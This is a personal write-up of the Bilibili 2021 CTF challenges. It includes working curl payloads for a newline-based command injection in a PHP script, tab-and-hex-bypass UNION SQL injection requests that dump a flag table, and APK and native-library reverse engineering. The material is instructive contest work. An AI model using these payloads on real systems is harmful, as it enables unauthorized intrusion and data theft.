Bilibili 2021 CTF

Today is the annual Programmer’s Day on October 24, and here I collect a brief record of the problem solving process for the second part of BiliBili 2021 Security Technical Match (I would also like to call that Capture the Flag Challenge).

0x01

Let’s start with the first challenge, we found a keyword “解密” which means decryption, a normal string happy_1024_2233 with 2 lines in total 48 bytes hex divided by a colon, then we merge and convert the 48 bytes message which located after the colon into binary format using xxd, pipe into openssl and using aes-128-ecb cipher without padding to decrypt the data, note that -K argument requires hex format for the key:

1
echo -n 'e9ca6f21583a1533d3ff4fd47ddc463c6a1c7d2cf084d3640408abca7deabb96a58f50471171b60e02b1a8dbd32db156' | xxd -r -p | openssl aes-128-ecb -nopad -d -K "$(echo -n 'happy_1024_2233' | xxd -p)"

Finally we got the first flag:

1
# a1cd5f84-27966146-3776f301-64031bb9

0x02

The second challenge is pointed to a user management website https://security.bilibili.com/sec1024/q. The website is written in Vue with webpack, we can view the source code of the website through SourceMap, and we found somethings instresting in
webpack:///src/views/home.vue:

1
2
3
4
5
6
7
8
9
10
11
12
...
export default {
// 36c7a7b4-cda04af0-8db0368d-b5166480
data() {
return {
token: '',
user_name: '',
user_role: '',
}
}, ...
}
...

Just guess and submit the contents of this comment, then we got the second flag confirmed:

1
# 36c7a7b4-cda04af0-8db0368d-b5166480

0x03

The third challenge give us a zip file, with a keyword PHP, a file named eval.php in the zip file, and we found that this php file is also accessible from the pro URL as its comments says:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
/*
bilibili- ( ゜- ゜)つロ 乾杯~
uat: http://192.168.3.2/uat/eval.php
pro: http://security.bilibili.com/sec1024/q/pro/eval.php
*/
$args = @$_GET['args'];
if (count($args)>3) {
exit();
}
for ($i=0; $i<count($args); $i++){
if (!preg_match('/^\w+$/', $args[$i])) {
exit();
}
}
// todo: other filter
$cmd = "/bin/2233 ".implode(" ", $args);
exec($cmd, $out);
for ($i=0; $i<count($out); $i++){
echo($out[$i]);
echo('<br>');
}
?>

Here’re two filter for the arguments args, the first one is not allow arguments more than 3, the second one regular expression filter /^\w+$/ only matches alphanumeric & underscores, note that a word ended with a linefeed (after urlencode is %0A) could also pass it.

That made us easily to escape from /bin/2233, the bin path and the responce from our browser tells it may a web server running Tengine on Linux, so just try to make a request with linux commands ls to list files:

1
2
3
4
5
6
curl -X GET -L 'http://security.bilibili.com/sec1024/q/pro/eval.php?args[]=0%0a&args[]=ls'

# 1.txt<br>
# passwd<br>
# data<br>
# config<br>

Just cat the passwd file:

1
curl -X GET -L 'http://security.bilibili.com/sec1024/q/pro/eval.php?args[]=0%0a&args[]=cat&args[]=passwd'

And we got the third flag confirmed from the response:

1
# 9d3c3014-6c6267e7-086aaee5-1f18452a

0x04

The fourth challenge is a URL pointed to the website as same as the second challenge, and the tips tells us to use SQL injection, we find the vulnerable part is that viewing 用户信息 or 日志信息 is making a POST request to https://security.bilibili.com/sec1024/q/admin/api/v1/ with request body:

1
{"user_id":"","user_name":"","action":"","page":1,"size":20}

We test if it injectable because there’re two differnent APIs, the injectable one is ended with log/list and we found that the character \t, \n and comment /**/ are not refused by filter:

1
2
3
4
5
curl -X POST -L 'https://security.bilibili.com/sec1024/q/admin/api/v1/log/list' \
-H 'Content-Type: application/json' \
-d '{"user_id":"","user_name":"true\tunion\tselect\tdatabase(),user(),1,2,3#","action":"","page":1,"size":20}'

# {"code":200,"data":{"res_list":[{"action":"2","id":"q","time":"3","user_id":"[email protected]","user_name":"1"}],"total":1},"msg":""}

Now try to get table names, remove id 3 and do the injection to show tables names:

1
2
3
4
5
curl -X POST -L 'https://security.bilibili.com/sec1024/q/admin/api/v1/log/list' \
-H 'Content-Type: application/json' \
-d '{"user_id":"","user_name":"true\tunion\tselect\tdatabase(),user(),1,2,group_concat(table_name)\tfrom\tinformation_schema.tables\twhere\ttable_schema=database()#","action":"","page":1,"size":20}'

# {"code":200,"data":{"res_list":[{"action":"2","id":"q","time":"flag,log,user","user_id":"[email protected]","user_name":"1"}],"total":1},"msg":""}

Next get the list of the flag table, the quote ' and " seems refused by the filter, we use hexadecimal flag (0x666c6167) to bypass:

1
2
3
4
5
curl -X POST -L 'https://security.bilibili.com/sec1024/q/admin/api/v1/log/list' \
-H 'Content-Type: application/json' \
-d '{"user_id":"","user_name":"true\tunion\tselect\tdatabase(),user(),1,2,group_concat(column_name)\tfrom\tinformation_schema.columns\twhere\ttable_schema=database()\tand\ttable_name=0x666c6167#","action":"","page":1,"size":20}'

# {"code":200,"data":{"res_list":[{"action":"2","id":"q","time":"id","user_id":"[email protected]","user_name":"1"}],"total":1},"msg":""}

It only has one list id, so we can get it directly:

1
2
3
4
5
curl -X POST -L 'https://security.bilibili.com/sec1024/q/admin/api/v1/log/list' \
-H 'Content-Type: application/json' \
-d '{"user_id":"","user_name":"true\tunion\tselect\tdatabase(),user(),1,2,group_concat(id)\tfrom\tflag#","action":"","page":1,"size":20}'

# {"code":200,"data":{"res_list":[{"action":"2","id":"q","time":"3d5dd579-0678ef93-18b70cae-cabc5d51","user_id":"[email protected]","user_name":"1"}],"total":1},"msg":""}

Finally, the fourth flag is here:

1
# 3d5dd579-0678ef93-18b70cae-cabc5d51

0x05

The entrance title remind me that this challenge is to reverse engineering a apk file, to decompile the apk file, there’re serveral ways, here I use the JADX:

1
jadx test.apk -d 'test' -v

Let’s take a look at the decompiled file’s structure:

1
2
3
4
5
6
7
8
9
10
11
12
13
tree test -L 2

# test
# ├── resources
# │   ├── AndroidManifest.xml
# │   ├── META-INF
# │   ├── classes.dex
# │   ├── lib
# │   └── res
# └── sources
# ├── android
# ├── androidx
# └── com

The main activity source code is in test/sources/com/example/test/MainActivity.java, which is the entry point of the app, here we found some useful information:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
...
public void onClick(View view) {
String obj = ((EditText) MainActivity.this.findViewById(R.id.TextAccount)).getText().toString();
String obj2 = ((EditText) MainActivity.this.findViewById(R.id.TextPassword)).getText().toString();
byte[] b = Encrypt.b(Encrypt.a(obj.getBytes(), 3));
byte[] b2 = Encrypt.b(Encrypt.a(obj2.getBytes(), 3));
byte[] bArr = {89, 87, 66, 108, 79, 109, 90, 110, 78, 106, 65, 117, 79, 109, 74, 109, 78, 122, 65, 120, 79, 50, 89, 61};
if (!Arrays.equals(b, new byte[]{78, 106, 73, 49, 79, 122, 65, 51, 89, 71, 65, 117, 78, 106, 78, 109, 78, 122, 99, 55, 89, 109, 85, 61}) || !Arrays.equals(b2, bArr)) {
Toast.makeText(MainActivity.this, "还差一点点~~~", 1).show();
} else {
Toast.makeText(MainActivity.this, "bilibili- ( ゜- ゜)つロ 乾杯~", 1).show();
}
}
...

Then take a look at the Encrypt method in source file test/sources/com/example/test/Encrypt.java:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
package com.example.test;
import android.util.Base64;
public class Encrypt {
public static byte[] a(byte[] bArr, int i) {
if (bArr == null || bArr.length == 0) {
return null;
}
int length = bArr.length;
for (int i2 = 0; i2 < length; i2++) {
bArr[i2] = (byte) (bArr[i2] ^ i);
}
return bArr;
}
public static byte[] b(byte[] bArr) {
return Base64.encode(bArr, 2);
}
}

We can see that the a method is bit operation, and the b method is base64 encoding, so just reverse the process step, we could have a decrypt function:

1
2
3
4
5
6
7
8
static void Decrypt(byte[] bArr, int i) {
byte[] bArrDecoded = Base64.getDecoder().decode(bArr);
int length = bArrDecoded.length;
for (int i2 = 0; i2 < length; i2++) {
bArrDecoded[i2] = (byte) (bArrDecoded[i2] ^ i);
}
System.out.println(new String(bArrDecoded));
}

And we calling that function to decrypt the password:

1
2
3
4
5
6
7
byte[] bArrAccount = {78, 106, 73, 49, 79, 122, 65, 51, 89, 71, 65, 117, 78, 106, 78, 109, 78, 122, 99, 55, 89, 109, 85, 61};
Decrypt(bArrAccount, 3);
byte[] bArrPassword = {89, 87, 66, 108, 79, 109, 90, 110, 78, 106, 65, 117, 79, 109, 74, 109, 78, 122, 65, 120, 79, 50, 89, 61};
Decrypt(bArrPassword, 3);

// 516834cc-50e448af
// bcf9ed53-9ae4328e

Combine the account and password, the final flag is:

1
# 516834cc-50e448af-bcf9ed53-9ae4328e

0x06

As same as the previous challenge, by inspecting the source code of the MainActivity.java again, we found the JNI handle function:

1
2
3
4
5
...
static {
System.loadLibrary("Mylib");
}
...

The dynamic library is libMylib.so, located in test/resources/lib with 4 different architectures, and we can use objdump to get the function list:

1
objdump -d x86_64/libMylib.so -T | less

Then it prints a function calls list:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
libMylib.so:          file format elf64-x86-64

DYNAMIC SYMBOL TABLE:
0000000000000000 DF *UND* 0000000000000000 __cxa_atexit
0000000000000000 DF *UND* 0000000000000000 __cxa_finalize
0000000000000000 DF *UND* 0000000000000000 __stack_chk_fail
0000000000000000 DF *UND* 0000000000000000 __strlen_chk
0000000000000000 DF *UND* 0000000000000000 __system_property_get
0000000000000000 DF *UND* 0000000000000000 __vsprintf_chk
0000000000000000 DF *UND* 0000000000000000 fclose
0000000000000000 DF *UND* 0000000000000000 fopen
0000000000000000 DF *UND* 0000000000000000 fputs
0000000000000000 DF *UND* 0000000000000000 fwrite
0000000000000000 DF *UND* 0000000000000000 memcpy
0000000000001620 g DF .text 0000000000000051 EE
0000000000000c70 g DF .text 00000000000008b6 ET
0000000000001720 g DF .text 00000000000002ce all
0000000000001ac0 g DF .text 0000000000000005 i
0000000000004058 g D *ABS* 0000000000000000 _edata
0000000000004058 g D *ABS* 0000000000000000 _end
0000000000001530 g DF .text 00000000000000e8 EF
0000000000000b60 g DF .text 0000000000000019 EI
0000000000000b80 g DF .text 00000000000000eb EU
0000000000004000 g DO .data 0000000000000040 PADDING
0000000000004058 g D *ABS* 0000000000000000 __bss_start
0000000000001680 g DF .text 0000000000000054 ED
0000000000001ad0 g DF .text 000000000000009a JNI_OnLoad
00000000000016e0 g DF .text 0000000000000025 f_e
0000000000001710 g DF .text 0000000000000005 system
...

Note the fclose, fputs, fwrite and fopen function calls, it may provides file operations, and we have also found a JNI_OnLoad function which is a bridge to the Android APP. For further investigation, I choose to use a decompiler called Ghidra to get the C/C++ source dumped and I found the all function dose the most staff:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
void all(JNIEnv *env) {
...
__system_property_get("ro.product.cpu.abi",local_40);
__system_property_get("ro.build.version.release",local_60);
if ((local_40[0] == 0x363878) && (local_60[0] == 0x39)) {
pFVar1 = fopen("/data/2233","r");
...
}
...
do {
sprintf((char *)&local_20,(uint)pFVar1,format,(uint)*(byte *)((int)&local_88 + iVar3));
sprintf(local_164,(uint)pFVar1,format,(uint)*(byte *)((int)&local_98 + iVar3));
fputs((char *)&local_20,__stream);
pFVar1 = __stream;
fputs(local_164,__stream);
iVar3 = iVar3 + 1;
} while (iVar3 != 0);
fwrite("-----------\n",0xc,1,__stream);
...
}

We can infer that the all function are getting two properties from Android system’s build.prop, and the first one is ro.product.cpu.abi and the second one is ro.build.version.release, if the first one equals to x86 (0x363878, endian reversed) and the second one equals to 9 (0x39), and has access to the file /data/2233, the printed words in this file would be related with the flag.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
...
00011416 83 c4 10 ADD ESP,0x10
00011419 81 bc 24 CMP dword ptr [ESP + local_40],0x363878
50 01 00
00 78 38
00011424 0f 85 0f JNZ LAB_00011439
00 00 00
0001142a 66 83 bc CMP word ptr [ESP + local_60],0x39
24 30 01
00 00 39
00011433 0f 85 00 JNZ LAB_00011439
00 00 00
.LAB_00011439 XREF[2]: 00011424(j), 00011433(j)
00011439 83 ec 08 SUB ESP,0x8
0001143c 8d 83 d8 LEA EAX,[EBX + 0xffffe8d8]=>DAT_00011890 = 72h r
e8 ff ff
00011442 8d b3 da LEA ESI,[EBX + 0xffffe8da]=>s_/data/2233_00011892 = "/data/2233"
e8 ff ff
...

I tried adding a LAB_00011439 lable inside the if block and JNZ to that lable though the condition is false, with a permition request in AndroidManifest.xml:

1
2
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />

Then re-sign the APK and install it on my x86-64 QEMU Android VM, unfortunately the app crashed unexpectly, so this way just not works, patching the dynamic library is not as easy as I thought, it may contains verifications and simply change the assembly just made it broken.

Instead of using Unicorn or other similar simulator, The easiest way to use a native rooted Android device. But I don’t have that currently, so I just want to try this challenge later.

0x07

As the challenge says, it’s a data analysis challenge, just download the log file. Initially, fix the evil-log.log file as a json file, and use python to parse the json file:

1
2
3
4
5
import json

f = open('evil-log.log')
raw = json.loads(data)
print(raw[0])

The printed data structure is:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
{
'@timestamp': '2021-10-18T02:00:04+0000',
'bytes_sent': '10346',
'cdn_scheme': 'https',
...
'http_path': '/s/video/BV1Jt4y1D7jJ',
'http_user_agent': '"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
'request_length': '582',
'request_time': '0.129',
...
'status': '200',
'upstream_status': '200',
'x_backend_bili_real_ip': 'gg.cej.hd.bii'
}

Then do some simple analysis to find the most frequent IPs:

1
2
3
4
5
6
7
8
9
dict_by_ip = dict()
for i in raw:
if i['x_backend_bili_real_ip'] not in dict_by_ip:
dict_by_ip[i['x_backend_bili_real_ip']] = 1
else:
dict_by_ip[i['x_backend_bili_real_ip']] += 1

sorted_ip = { k : v for k, v in sorted(dict_by_ip.items(), key = lambda x : x[1], reverse = True) }
print(sorted_ip)

And also analyze the UA as the same way:

1
2
3
4
5
6
7
8
9
dict_by_ua = dict()
for i in raw:
if i['http_user_agent'] not in dict_by_ua:
dict_by_ua[i['http_user_agent']] = 1
else:
dict_by_ua[i['http_user_agent']] += 1

sorted_ua = { k : v for k, v in sorted(dict_by_ua.items(), key = lambda x : x[1], reverse = True) }
print(sorted_ua)

For further analysis, I prefer to look at the distribution of request frequency of different IPs and UA on the timeline, find a time period of peak requests and the IPs requested within this time period, and for these IPs, sort them by their request frequency and establish some correspondence. Assuming that the number of requests for an IP is n, the number of normal requests (Status 200) is P, the number of abnormal requests is Q, and the richness of the requested paths is V during this time period, a similar equation F can be obtained as the basis for the ordering:

$$
F=an-bP+cQ-dV+eQV
$$

Real scenarios are often more complex, I didn’t try to analyze them further so I only got a partial score for this challenge. I also read a good article How to analyze log data with Python and Apache Spark. If I have more spare time, I will try to do this challenge again.

I am not familiar to data analysis or algorithmic models used for data analysis, applying machine learning to it also seems interesting, so there is still a lot of things for me to learn. That’s all, thanks for reading.